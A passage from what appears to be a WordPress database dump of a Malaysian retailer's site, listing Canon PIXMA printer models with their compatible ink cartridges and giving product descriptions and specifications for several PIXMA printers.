width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP520</p></td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP530</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP568</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP600</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-24 16:16:50','2019-09-24 08:16:50','',1449,'https://bintara.com.my/blog/2019/09/24/1449-revision-v1/',0,'revision','',0),(3301,1,'2019-09-24 16:08:14','2019-09-24 08:08:14','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><center>[maxbutton id=\"11\" ]</center><p>Â </p>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><p>Â </p><center></center><center></center><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center><p>Â </p>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 